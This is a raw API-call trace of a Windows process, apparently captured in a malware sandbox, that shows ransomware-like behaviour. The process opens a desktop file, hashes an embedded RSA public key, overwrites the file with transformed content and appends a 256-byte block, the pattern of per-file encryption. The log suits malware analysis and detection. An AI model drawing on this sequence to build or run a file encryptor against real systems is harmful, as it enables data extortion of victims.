ftCreationTime.dwLowDateTime=0xa66333b0, ftCreationTime.dwHighDateTime=0x1d5dcb8, ftLastAccessTime.dwLowDateTime=0x210e80b0, ftLastAccessTime.dwHighDateTime=0x1d5dafc, ftLastWriteTime.dwLowDateTime=0x210e80b0, ftLastWriteTime.dwHighDateTime=0x1d5dafc, nFileSizeHigh=0x0, nFileSizeLow=0x3d57, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ORl97 rSVzgg.m4a", cAlternateFileName="ORL97R~1.M4A")) returned 1 [0170.180] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x70) returned 0x35f2840 [0170.180] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xa6) returned 0x35e3330 [0170.180] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f2840 | out: hHeap=0xcd0000) returned 1 [0170.181] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\ORl97 rSVzgg.m4a") returned=".m4a" [0170.181] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\5RddQRlUxLC956\\ORl97 rSVzgg.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\5rddqrluxlc956\\orl97 rsvzgg.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x664 [0170.181] GetFileSizeEx (in: hFile=0x664, lpFileSize=0x401fb40 | out: lpFileSize=0x401fb40*=15703) returned 1 [0170.181] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2d80000 [0170.185] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3d31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.185] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x401fb78, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb78*=0x26, lpOverlapped=0x0) returned 1 [0170.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.186] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.186] SetFilePointer (in: hFile=0x664, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0170.186] ReadFile (in: hFile=0x664, lpBuffer=0x2d80000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x401fb70, lpOverlapped=0x0 | out: lpBuffer=0x2d80000*, lpNumberOfBytesRead=0x401fb70*=0x3d57, lpOverlapped=0x0) returned 1 [0170.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.186] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f3) returned 0x3b39e58 [0170.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.186] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAqqaH43nFXUSCKrZSI3QH\\\\nZsBASbdlkzslpqlqP7dksnv87eDBplMESiVXFlJfMWweIyDXJouVgihYFX6u6U5o\\\\nvZ6J97wFE\\/EQ63n24TzyD3gofj1aSS6mFJm+zJHvzYKkBWYn5aT4TNJjAUPH5DX8\\\\nO+HmDa6pLa0+Qsk78Si05G1oUAMNSai\\/Im3LD4xdf3E0Hlry0njkKDc8v7tN73HV\\\\n7EHzQF\\/ABJtsc7ZdhgcfV534A\\/nRRR6Ya+3EW5Wl0Arex69zW+NyqsUfXITjhpKl\\\\ncLnOIrVnzGNd0\\/MXXW01wgLqEu5x1DeqCy0sBQqRUFydxpKQVPtktiif+fBDgAFW\\\\n5QIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 494 [0170.186] CryptAcquireContextW (in: phProv=0x401fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x401fa50*=0xd2ebf0) returned 1 [0170.188] CryptCreateHash (in: hProv=0xd2ebf0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x401fa58 | out: phHash=0x401fa58) returned 1 [0170.188] CryptHashData (hHash=0x362b8e0, pbData=0x3b39e58, dwDataLen=0x1f3, dwFlags=0x0) returned 1 [0170.188] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x401fa54) returned 1 [0170.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x11) returned 0x35e06d0 [0170.188] CryptGetHashParam (in: hHash=0x362b8e0, dwParam=0x2, pbData=0x35e06d0, pdwDataLen=0x401fa54, dwFlags=0x0 | out: pbData=0x35e06d0, pdwDataLen=0x401fa54) returned 1 [0170.188] GetLastError () returned 0x0 [0170.188] CryptDestroyHash (hHash=0x362b8e0) returned 1 [0170.188] CryptReleaseContext (hProv=0xd2ebf0, dwFlags=0x0) returned 1 [0170.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.188] UuidCreate (in: Uuid=0x401fa48 | out: Uuid=0x401fa48) returned 0x0 [0170.188] UuidToStringA (in: Uuid=0x401fa48, StringUuid=0x401fa40 | out: StringUuid=0x401fa40) returned 0x0 [0170.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.188] RpcStringFreeA (in: String=0x401fa40 | out: String=0x401fa40) returned 0x0 [0170.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a38 | out: hHeap=0xcd0000) returned 1 [0170.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608a38 [0170.188] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x3d60) returned 0x3b4dd10 [0170.188] SetFilePointer (in: hFile=0x664, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0170.188] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b39e58 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x30) returned 0x3608b88 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1f0) returned 0x3b44498 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x3613610 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bfb0 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc200 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x40) returned 0x3b4bff8 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc218 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc248 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc260 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x24) returned 0x35f9e20 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x158) returned 0x3b51ec0 [0170.189] RtlReAllocateHeap (Heap=0xcd0000, Flags=0x0, Ptr=0x3b51ec0, Size=0x218) returned 0x3b5ed58 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x558) returned 0x3b48820 [0170.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f9e20 | out: hHeap=0xcd0000) returned 1 [0170.189] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 | out: hHeap=0xcd0000) returned 1 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd310 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc260 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.189] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x9) returned 0x35fc248 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd330 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10e) returned 0x3b44690 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c6d8 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x58) returned 0x36136d0 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e06d0 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x104) returned 0x3aa2470 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a50 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd290 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3613610 | out: hHeap=0xcd0000) returned 1 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b5ed58 | out: hHeap=0xcd0000) returned 1 [0170.190] GetCurrentThreadId () returned 0x324 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x3b44690 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x82) returned 0x3b49e30 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x2c) returned 0x3608a70 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x80) returned 0xd2ebf0 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x148) returned 0x35deb08 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd330 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd57fe0 [0170.190] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.190] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.191] GetCurrentThreadId () returned 0x324 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xeb) returned 0x35ceae8 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x64) returned 0xdc82f8 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc82f8 | out: hHeap=0xcd0000) returned 1 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0x35ceae8 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4c) returned 0x362cad8 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd310 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xd23a00 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbb70 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2f0 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd300 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2e0 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2a0 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd2c0 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd320 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc248 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd2f0 [0170.191] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.191] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd280 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd350 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd360 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x4) returned 0x35fd340 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc260 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd360 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x18) returned 0x35e0a70 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd350 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fc230 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd340 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbc90 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd280 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2c0 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbbe8 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd280 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc) returned 0x35fbc00 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc278 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fbbe8 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc00 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x8) returned 0x35fd300 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd310 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x14) returned 0x35e0a10 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd300 | out: hHeap=0xcd0000) returned 1 [0170.192] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x1c) returned 0x3b3c6d8 [0170.192] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10) returned 0x35fc248 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2f0 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x204) returned 0x3b44ac8 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbb70 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa26a0 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbbe8 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x210) returned 0x3b51a78 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x10c) returned 0x35f7c30 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2e0 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x108) returned 0x3aa2588 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc248 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x200) returned 0x3b51c90 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa26a0 | out: hHeap=0xcd0000) returned 1 [0170.193] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x100) returned 0xdc53e8 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd330 | out: hHeap=0xcd0000) returned 1 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd2ebf0 | out: hHeap=0xcd0000) returned 1 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35ceae8 | out: hHeap=0xcd0000) returned 1 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xdc53e8 | out: hHeap=0xcd0000) returned 1 [0170.193] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a10 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2588 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51a78 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b51c90 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35f7c30 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd2a0 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc278 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd320 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fbc90 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a70 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc260 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc230 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35deb08 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608a70 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd57fe0 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fc218 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4bff8 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44ac8 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0xd23a00 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x362cad8 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3aa2470 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e06d0 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35fd290 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x35e0a50 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36136d0 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44498 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3608b88 | out: hHeap=0xcd0000) returned 1 [0170.194] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b39e58 | out: hHeap=0xcd0000) returned 1 [0170.194] WriteFile (in: hFile=0x664, lpBuffer=0x3b4dd10*, nNumberOfBytesToWrite=0x3d52, lpNumberOfBytesWritten=0x401fb14, lpOverlapped=0x0 | out: lpBuffer=0x3b4dd10*, lpNumberOfBytesWritten=0x401fb14*=0x3d52, lpOverlapped=0x0) returned 1 [0170.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b4dd10 | out: hHeap=0xcd0000) returned 1 [0170.195] SetFilePointerEx (in: hFile=0x664, liDistanceToMove=0x3d57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0170.195] WriteFile (in: hFile=0x664, lpBuffer=0x3b44690*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x401fb50, lpOverlapped=0x0 | out: lpBuffer=0x3b44690*, lpNumberOfBytesWritten=0x401fb50*=0x100, lpOverlapped=0x0) returned 1 [0170.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44690 | out: hHeap=0xcd0000) returned 1 [0170.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x60) returned 0xd71ba0 [0170.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x428) returned 0x3b48820 [0170.195] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", cchWideChar=-1, lpMultiByteStr=0x3b48820, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW", lpUsedDefaultChar=0x0) returned 41 [0170.195] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x430) returned 0x3b48c50 [0170.195] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b48820 